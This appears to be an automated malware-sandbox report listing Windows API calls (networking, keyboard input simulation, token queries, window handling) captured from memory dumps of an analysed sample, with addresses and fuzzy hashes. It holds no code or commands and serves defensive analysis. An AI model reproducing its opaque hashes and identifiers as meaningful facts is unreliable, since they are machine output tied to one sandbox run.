                            • Opcode Fuzzy Hash: f6a04c4e0e2c372a5c9dce31c7d3d89f69dcf483999bd3a52b2811eff73441be
                            • Instruction Fuzzy Hash: B041B270A04209ABDF12EF54D855FEE7BB9EF44760F00006AF905A7291DB74AE84CBA5
                            APIs
                            • socket.WSOCK32(00000002,00000002,00000011), ref: 004369D1
                            • WSAGetLastError.WSOCK32(00000000), ref: 004369E1
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00436A45
                            • WSAGetLastError.WSOCK32(00000000), ref: 00436A51
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorLast$__itow__swprintfsocket
                            • String ID:
                            • API String ID: 2214342067-0
                            • Opcode ID: 98ce98f5e9afa741ddcdac5b46a855bff520e846e17f3f08bf228b72084831aa
                            • Instruction ID: ff1fafa6352083560ed69db4b8cce2dba05a53912b42fb02e3a4a647762bae71
                            • Opcode Fuzzy Hash: 98ce98f5e9afa741ddcdac5b46a855bff520e846e17f3f08bf228b72084831aa
                            • Instruction Fuzzy Hash: 8F419175640200BFEB61BF24CC8AF2A77E4AB49B14F05C42DFA59EF2C2DA749D008795
                            APIs
                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0044F910), ref: 004364A7
                            • _strlen.LIBCMT ref: 004364D9
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID:
                            • API String ID: 4218353326-0
                            • Opcode ID: bf4b0d7b230b8910dfbd5917c35a856e21899e5c7785904d2b39f7c880b2da1e
                            • Instruction ID: 924471e4fca5d22720fd8791eaf602285cb7eeea7d77e4071bf5027eb6caa6c0
                            • Opcode Fuzzy Hash: bf4b0d7b230b8910dfbd5917c35a856e21899e5c7785904d2b39f7c880b2da1e
                            • Instruction Fuzzy Hash: 7041E631600105BFCB15EBA9EC85FAEB7A9AF08314F11816AF916DB292DB34ED44CB54
                            APIs
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0042B89E
                            • GetLastError.KERNEL32(?,00000000), ref: 0042B8C4
                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0042B8E9
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0042B915
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateHardLink$DeleteErrorFileLast
                            • String ID:
                            • API String ID: 3321077145-0
                            • Opcode ID: d200b41689b5985516dd780d9b507117c90ae97e2ef79b9051423294f908559e
                            • Instruction ID: 0e30d34884d1c62a86b523e000327854b9867681ed89297fa2b5324ad557e8d6
                            • Opcode Fuzzy Hash: d200b41689b5985516dd780d9b507117c90ae97e2ef79b9051423294f908559e
                            • Instruction Fuzzy Hash: C141F439A00610DFCB11EF15C589B5ABBE1FF4A710B09809AEC4A9F362CB34ED41CB95
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00420B27
                            • SetKeyboardState.USER32(00000080), ref: 00420B43
                            • PostMessageW.USER32 ref: 00420BA9
                            • SendInput.USER32(00000001,00000000,0000001C), ref: 00420BFB
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            • Opcode ID: cf43f8c4051b38e823bb69731efac8cafb2b5fd0fc32378f6bd0f991a3a2f23a
                            • Instruction ID: 704d345452b2f5a5a6307bb57fc26b31a9df6399197a4a61c48b164f893ed60b
                            • Opcode Fuzzy Hash: cf43f8c4051b38e823bb69731efac8cafb2b5fd0fc32378f6bd0f991a3a2f23a
                            • Instruction Fuzzy Hash: 5F313B70F402286EFB308BA5AC05BFBBFE5AB45318F84425BE490512D3C37C6945975D
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00420C66
                            • SetKeyboardState.USER32(00000080), ref: 00420C82
                            • PostMessageW.USER32 ref: 00420CE1
                            • SendInput.USER32(00000001,?,0000001C), ref: 00420D33
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            • Opcode ID: 9b7ae2720dfb9f7f12b60808ac66f39b94fbf4692d2f5c4343f364b6d1c3a750
                            • Instruction ID: 484b98577baa5b4c871c3e10f951de0ea0f5a7378a9bc05f75d1a7855e832d95
                            • Opcode Fuzzy Hash: 9b7ae2720dfb9f7f12b60808ac66f39b94fbf4692d2f5c4343f364b6d1c3a750
                            • Instruction Fuzzy Hash: C6312B70B402286EFF388B66A8047FFBBE6AB45310F84432FE485512D2C37D5946D769
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003F61FB
                            • __isleadbyte_l.LIBCMT ref: 003F6229
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003F6257
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003F628D
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 6d8ed7d8ec55ac1ea43be050658c7fbb821317bc846e21bc6d3111367c1824fd
                            • Instruction ID: 2298a75f216d5e9f3db84047285ae4909665456a93b782ef40e93564a960c0da
                            • Opcode Fuzzy Hash: 6d8ed7d8ec55ac1ea43be050658c7fbb821317bc846e21bc6d3111367c1824fd
                            • Instruction Fuzzy Hash: 7831D03060025ABFDF228F65CC46BBB7BB9FF42310F164928E9249B1A1D731E950DB90
                            APIs
                            • GetForegroundWindow.USER32 ref: 00444F02
                              • Part of subcall function 00423641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042365B
                              • Part of subcall function 00423641: GetCurrentThreadId.KERNEL32(00000000,?,00425005), ref: 00423662
                              • Part of subcall function 00423641: AttachThreadInput.USER32(00000000,?,00425005), ref: 00423669
                            • GetCaretPos.USER32(?), ref: 00444F13
                            • ClientToScreen.USER32(00000000,?), ref: 00444F4E
                            • GetForegroundWindow.USER32 ref: 00444F54
                            Similarity
                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                            APIs
                              • Part of subcall function 0041810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00418121
                              • Part of subcall function 0041810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0041812B
                              • Part of subcall function 0041810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0041813A
                              • Part of subcall function 0041810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00418141
                              • Part of subcall function 0041810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00418157
                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004186A3
                            • _memcmp.LIBCMT ref: 004186C6
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004186FC
                            • HeapFree.KERNEL32(00000000), ref: 00418703
                            Similarity
                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                            APIs
                            • __setmode.LIBCMT ref: 003E09AE
                              • Part of subcall function 003C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00427896,?,?,00000000), ref: 003C5A2C
                              • Part of subcall function 003C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00427896,?,?,00000000,?,?), ref: 003C5A50
                            • _fprintf.LIBCMT ref: 003E09E5
                            • OutputDebugStringW.KERNEL32(?), ref: 00415DBB
                              • Part of subcall function 003E4AAA: _flsall.LIBCMT ref: 003E4AC3
                            • __setmode.LIBCMT ref: 003E0A1A
                            Similarity
                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004317A3
                              • Part of subcall function 0043182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0043184C
                              • Part of subcall function 0043182D: InternetCloseHandle.WININET(00000000), ref: 004318E9
                            Similarity
                            • API ID: Internet$CloseConnectHandleOpen
                            APIs
                            • GetFileAttributesW.KERNEL32(?,0044FAC0), ref: 00423A64
                            • GetLastError.KERNEL32 ref: 00423A73
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00423A82
                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0044FAC0), ref: 00423ADF
                            Similarity
                            • API ID: CreateDirectory$AttributesErrorFileLast
                            APIs
                            • _free.LIBCMT ref: 003F5101
                              • Part of subcall function 003E571C: __FF_MSGBANNER.LIBCMT ref: 003E5733
                              • Part of subcall function 003E571C: __NMSG_WRITE.LIBCMT ref: 003E573A
                              • Part of subcall function 003E571C: RtlAllocateHeap.NTDLL(00E00000,00000000,00000001,00000000,?,?,?,003E0DD3,?), ref: 003E575F
                            Similarity
                            • API ID: AllocateHeap_free
                            APIs
                            • _memset.LIBCMT ref: 003C44CF
                              • Part of subcall function 003C407C: _memset.LIBCMT ref: 003C40FC
                              • Part of subcall function 003C407C: _wcscpy.LIBCMT ref: 003C4150
                              • Part of subcall function 003C407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003C4160
                            • KillTimer.USER32 ref: 003C4524
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003C4533
                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003FD4B9
                            Similarity
                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                            APIs
                              • Part of subcall function 003C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00427896,?,?,00000000), ref: 003C5A2C
                              • Part of subcall function 003C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00427896,?,?,00000000,?,?), ref: 003C5A50
                            • gethostbyname.WSOCK32(?,?,?), ref: 00436399
                            • WSAGetLastError.WSOCK32(00000000), ref: 004363A4
                            • _memmove.LIBCMT ref: 004363D1
                            • inet_ntoa.WSOCK32(?), ref: 004363DC
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                            APIs
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00418B61
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00418B73
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00418B89
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00418BA4
                            Similarity
                            • API ID: MessageSend
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • DefDlgProcW.USER32(?,00000020,?), ref: 003C12D8
                            • GetClientRect.USER32(?,?,?,?,?), ref: 003FB5FB
                            • GetCursorPos.USER32(?), ref: 003FB605
                            • ScreenToClient.USER32(?,?), ref: 003FB610
                            Similarity
                            • API ID: Client$CursorLongProcRectScreenWindow
                            APIs
                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0041D84D
                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0041D864
                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0041D879
                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0041D897
                            Similarity
                            • API ID: Type$Register$FileLoadModuleNameUser
                            APIs
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 0044B2E4
                            • ScreenToClient.USER32(?,?), ref: 0044B2FC
                            • ScreenToClient.USER32(?,?), ref: 0044B320
                            • InvalidateRect.USER32(?,?,?), ref: 0044B33B
                            Similarity
                            • API ID: ClientRectScreen$InvalidateWindow
                            APIs
                            • EnterCriticalSection.KERNEL32(?), ref: 00426BE6
                              • Part of subcall function 004276C4: _memset.LIBCMT ref: 004276F9
                            • _memmove.LIBCMT ref: 00426C09
                            • _memset.LIBCMT ref: 00426C16
                            • LeaveCriticalSection.KERNEL32(?), ref: 00426C26
                            Similarity
                            • API ID: CriticalSection_memset$EnterLeave_memmove
                            APIs
                            • GetSysColor.USER32(00000008,00000000), ref: 003C2231
                            • SetTextColor.GDI32(?,000000FF), ref: 003C223B
                            • SetBkMode.GDI32(?,00000001), ref: 003C2250
                            • GetStockObject.GDI32(00000005), ref: 003C2258
                            • GetWindowDC.USER32(?), ref: 003FBE83
                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 003FBE90
                            • GetPixel.GDI32(00000000,?,00000000), ref: 003FBEA9
                            • GetPixel.GDI32(00000000,00000000,?), ref: 003FBEC2
                            • GetPixel.GDI32(00000000,?,?), ref: 003FBEE2
                            • ReleaseDC.USER32(?,00000000), ref: 003FBEED
                            Similarity
                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                            • String ID:
                            • API String ID: 1946975507-0
                            • Opcode ID: 6a838d3dcae70ef49cc68dd06cf4bb1032fe4b571c585659018d07fba148d8ea
                            • Instruction ID: 85ec5e45115bfb695fceaa7c4a5c2bd31314713a83a3313ba3c034d42973f9dd
                            • Opcode Fuzzy Hash: 6a838d3dcae70ef49cc68dd06cf4bb1032fe4b571c585659018d07fba148d8ea
                            • Instruction Fuzzy Hash: 2FE03936104244EAEB225FA4FC0DBE87B10EB16332F018376FA69980E1C7B14984DB12
                            APIs
                            • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00418195,?,?,?,004182E6), ref: 0041871B
                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,004182E6), ref: 00418722
                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004182E6), ref: 0041872F
                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,004182E6), ref: 00418736
                            Similarity
                            • API ID: CurrentOpenProcessThreadToken
                            • String ID:
                            • API String ID: 3974789173-0
                            • Opcode ID: ed4374ba9a7d12fce2766ccacccef38ac854a5555b3f6bb0f18524be15c86c33
                            • Instruction ID: 6bfc54a6ef2691fa078b911f4cdf84457ca74c53899f70a598bca0a84a526e08
                            • Opcode Fuzzy Hash: ed4374ba9a7d12fce2766ccacccef38ac854a5555b3f6bb0f18524be15c86c33
                            • Instruction Fuzzy Hash: 52E0863A6112119BD7205FB09D0CB973BACEF52791F144838B645C9080DA388489C754
                            Strings
                            Similarity
                            • API ID:
                            • String ID: %E
                            • API String ID: 0-175436132
                            • Opcode ID: adb9520cceef83a0221b03e8691c44c3712247d6a3da29f63d01b8d30c313ebf
                            • Instruction ID: 4b876a099d83add84ed0b6ce12874f5f7aee1a4a174cdfff6a0118266a629aae
                            • Opcode Fuzzy Hash: adb9520cceef83a0221b03e8691c44c3712247d6a3da29f63d01b8d30c313ebf
                            • Instruction Fuzzy Hash: 26B17E759002099BCF16EB94C886FFEB7B9EF44310F10452EE912EB1A1DB349E85CB91
                            APIs
                            Strings
                            Similarity
                            • API ID: __itow_s
                            • String ID: xbH$xbH
                            • API String ID: 3653519197-891960813
                            • Opcode ID: 453e9a93cbe7b78753b9aba5f42afe03c4af8a51de2882a2f9dfe35d514bf05e
                            • Instruction ID: 9e29e2946772ca66017da0fb01112c295d13196bbee3e023db54f620c24f21ce
                            • Opcode Fuzzy Hash: 453e9a93cbe7b78753b9aba5f42afe03c4af8a51de2882a2f9dfe35d514bf05e
                            • Instruction Fuzzy Hash: DDB17D70A00109EBCF14EF54C891EAABBB9FF58340F14955AFA45DB291EB34ED41CBA4
                            APIs
                              • Part of subcall function 003DFC86: _wcscpy.LIBCMT ref: 003DFCA9
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • __wcsnicmp.LIBCMT ref: 0042B02D
                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0042B0F6
                            Strings
                            Similarity
                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                            • String ID: LPT
                            • API String ID: 3222508074-1350329615
                            • Opcode ID: 85ae1c239e1e4f19d6aac420a05a0f75474f9f0e74e5dbc5f3e032662d8e643d
                            • Instruction ID: 70db304cefcd3e1d05daa39168cbcd78abb205c71d1847ad190b508ad6fe4932
                            • Opcode Fuzzy Hash: 85ae1c239e1e4f19d6aac420a05a0f75474f9f0e74e5dbc5f3e032662d8e643d
                            • Instruction Fuzzy Hash: 4061C071A00224AFCB05DF94D895EBFB7B4EF08300F51406AF916AB391DB74AE80CB95
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 003D2968
                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 003D2981
                            Strings
                            Similarity
                            • API ID: GlobalMemorySleepStatus
                            • String ID: @
                            • API String ID: 2783356886-2766056989
                            • Opcode ID: 2033e406924adc7c9c20d8f7957988f305ad856e21bc2a93f47112d3523e8f35
                            • Instruction ID: 41ffdf7f3883845217d6abb50c7bfa279953103160cb3737b935624d114a8751
                            • Opcode Fuzzy Hash: 2033e406924adc7c9c20d8f7957988f305ad856e21bc2a93f47112d3523e8f35
                            • Instruction Fuzzy Hash: 74514A714087449BD721EF20D885BAFB7E8FF85344F42485DF1D8861A1EB71892DCB56
                            APIs
                              • Part of subcall function 003C4F0B: __fread_nolock.LIBCMT ref: 003C4F29
                            • _wcscmp.LIBCMT ref: 00429824
                            • _wcscmp.LIBCMT ref: 00429837
                            Strings
                            Similarity
                            • API ID: _wcscmp$__fread_nolock
                            • String ID: FILE
                            • API String ID: 4029003684-3121273764
                            • Opcode ID: 8748232acb66b90e7a87881eff24f71229ce599a7289a15d20035af647918d78
                            • Instruction ID: 3631d8495ad495a7ac6cf1f9c0b99d0982f1f173aa9af4980941d9a5a3c09d18
                            • Opcode Fuzzy Hash: 8748232acb66b90e7a87881eff24f71229ce599a7289a15d20035af647918d78
                            • Instruction Fuzzy Hash: B941E971A00219BADF21AAA1DC45FEFBBBDEF85710F40006EF904EB280DA759D04CB65
                            APIs
                            Strings
                            Similarity
                            • API ID: ClearVariant
                            • String ID: DdH$DdH
                            • API String ID: 1473721057-4154174116
                            • Opcode ID: ab28dd06b3e62dbb1c8b020664341438f22c094f604dc42897f39afc9220730b
                            • Instruction ID: 80627b1f5ad237a25d5e78f1dea58bd020a3dde0530e4d6e8472b430eaaa7b5d
                            • Opcode Fuzzy Hash: ab28dd06b3e62dbb1c8b020664341438f22c094f604dc42897f39afc9220730b
                            • Instruction Fuzzy Hash: 345120B86087058FD795DF18C480B1ABBF1BB88758F55886DE885CB361D331EC81CB46
                            APIs
                            • _memset.LIBCMT ref: 0043259E
                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004325D4
                            Strings
                            Similarity
                            • API ID: CrackInternet_memset
                            • String ID: |
                            • API String ID: 1413715105-2343686810
                            • Opcode ID: 652ea63232cbe3d6649acef57b6693904a41b941fab6cbebc2e3e402773630ea
                            • Instruction ID: ba37cdac2c5ac6b0a57dba43a1e6e440f4b8617cff82a228f12f16cd0035754b
                            • Opcode Fuzzy Hash: 652ea63232cbe3d6649acef57b6693904a41b941fab6cbebc2e3e402773630ea
                            • Instruction Fuzzy Hash: 0531F871800119ABCF01AFA1CD86EEEBFB8FF08310F10105AED55AA162DB755956DF60
                            APIs
                            • DestroyWindow.USER32 ref: 00446B17
                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00446B53
                            Strings
                            Similarity
                            • API ID: Window$DestroyMove
                            • String ID: static
                            • API String ID: 2139405536-2160076837
                            • Opcode ID: 65ec6c7ef1e45c4f3a31b1b0a1b420342c2d88b04c7c1c2f9055fd4904d1ac53
                            • Instruction ID: 2078b19ff92134261e957592d3f99a0e04d595e916124c5842d08ed520653ecd
                            • Opcode Fuzzy Hash: 65ec6c7ef1e45c4f3a31b1b0a1b420342c2d88b04c7c1c2f9055fd4904d1ac53
                            • Instruction Fuzzy Hash: C4319071200604AEEB109F64CC40FFB73A9FF49764F11852EF9A5D7190DA34AC91CB65
                            APIs
                            Strings
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            • API String ID: 2223754486-4108050209
                            • Opcode ID: c9f01caf883fe3be389c9ccdd47e44bc5164d9cb25a39a5b696800e84677ebb1
                            • Instruction ID: 11ae69f1ccf102ddd889a1f6a16cb866fabbec909fb52f0f086d5a9ee88760ab
                            • Opcode Fuzzy Hash: c9f01caf883fe3be389c9ccdd47e44bc5164d9cb25a39a5b696800e84677ebb1
                            • Instruction Fuzzy Hash: 5631FC71700325BBDB25DF44EE457AFBBB4EF45350F54001AED81962A0D7B49980CB19
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                              • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                            • GetParent.USER32(?), ref: 003FB7BA
                            • DefDlgProcW.USER32(?,00000133,?,?,?,?,?,?,?,?,003C19B3,?,?,?,00000006,?), ref: 003FB834
                            Strings
                            Similarity
                            • API ID: LongWindow$ParentProc
                            • String ID: `$
                            • API String ID: 2181805148-74666722
                            • Opcode ID: c7597651cf3ecc5f820fcf42f1f65186228d545b25064b3e25ada92743d617ab
                            • Instruction ID: b175d89ed35db2f26ca6d2b31e7b96005f5cc4a2eeafa860c3c336286724e6a9
                            • Opcode Fuzzy Hash: c7597651cf3ecc5f820fcf42f1f65186228d545b25064b3e25ada92743d617ab
                            • Instruction Fuzzy Hash: A221EC38201508AFCB129F28C984FB93BD6EF4B320F594269F5259B2F2C7315D11EB54
                            APIs
                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00446761
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0044676C
                            Strings
                            Similarity
                            • API ID: MessageSend
                            • String ID: Combobox
                            • API String ID: 3850602802-2096851135
                            • Opcode ID: 94b203dfb10a645636bc514227f853d36ab9340805d071318d2dce5a4b33f700
                            • Instruction ID: 4161b4e1d548426df3710bb9c427382eb21293e9e230694a25b4724675c73e4c
                            • Opcode Fuzzy Hash: 94b203dfb10a645636bc514227f853d36ab9340805d071318d2dce5a4b33f700
                            • Instruction Fuzzy Hash: 8B11B275200208AFFF119F54CC81EFB376AEB4A3A8F12412AF91897390D639DC5187A5
                            Strings
                            Similarity
                            • API ID:
                            • String ID: `$
                            • API String ID: 0-74666722
                            • Opcode ID: 955be5b0b082054bc2d16830f79eafc75fea3155be930f647537643ad6e82cbf
                            • Instruction ID: fdd1e5540bc1651a1a3907f159ad4ce4bf2ad4b0f4a468bab6966d0ee0e36134
                            • Opcode Fuzzy Hash: 955be5b0b082054bc2d16830f79eafc75fea3155be930f647537643ad6e82cbf
                            • Instruction Fuzzy Hash: F8215C39124508FFFB109F54CC45FBB37A4EB09310F404166FA16DA2E0D679AD11AB69
                            APIs
                              • Part of subcall function 003C1D35: CreateWindowExW.USER32 ref: 003C1D73
                              • Part of subcall function 003C1D35: GetStockObject.GDI32(00000011), ref: 003C1D87
                              • Part of subcall function 003C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
                            • GetWindowRect.USER32(00000000,?), ref: 00446C71
                            • GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 00446C8B
                            Strings
                            Similarity
                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                            • String ID: static
                            • API String ID: 1983116058-2160076837
                            • Opcode ID: 6349e165c1c1f3b479a81c64f9a76c39b593b9aaa21c9ac79f5c2ca1c5839c9a
                            • Instruction ID: a8d3cc531d5013543b61a6715bc96a04b917f19826e1b0dab854a53257b0fd69
                            • Opcode Fuzzy Hash: 6349e165c1c1f3b479a81c64f9a76c39b593b9aaa21c9ac79f5c2ca1c5839c9a
                            • Instruction Fuzzy Hash: 13215672610209AFEF04DFA8CC85EFABBB8FB09304F014629FD95D2250D639E851DB65
                            APIs
                            Strings
                            Similarity
                            • API ID: CreateMenuPopup
                            • String ID: `$
                            • API String ID: 3826294624-74666722
                            • Opcode ID: 7ed6e2117de04ae8da02fd27bd4d8bb6885f19639570e206cc0d35fac3bde031
                            • Instruction ID: 56abf209474e044b5328d5d88b844d6f1e06ec16b451d2c9b919beb72069f484
                            • Opcode Fuzzy Hash: 7ed6e2117de04ae8da02fd27bd4d8bb6885f19639570e206cc0d35fac3bde031
                            • Instruction Fuzzy Hash: 56219D78500609DFDB20DF28D444BD67BE1FB0A324F05856AE8598B391C339AC56CF5A
                            APIs
                            • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 004469A2
                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004469B1
                            Strings
                            Similarity
                            • API ID: LengthMessageSendTextWindow
                            • String ID: edit
                            • API String ID: 2978978980-2167791130
                            • Opcode ID: ffd6b10151beb75c1a727a9309a537149b3c4383082fc1c2730b9f4f52379b49
                            • Instruction ID: b25b249498e376653a47d146f79de01265bf8ff06b7b84b4f893b877e9c05e0b
                            • Opcode Fuzzy Hash: ffd6b10151beb75c1a727a9309a537149b3c4383082fc1c2730b9f4f52379b49
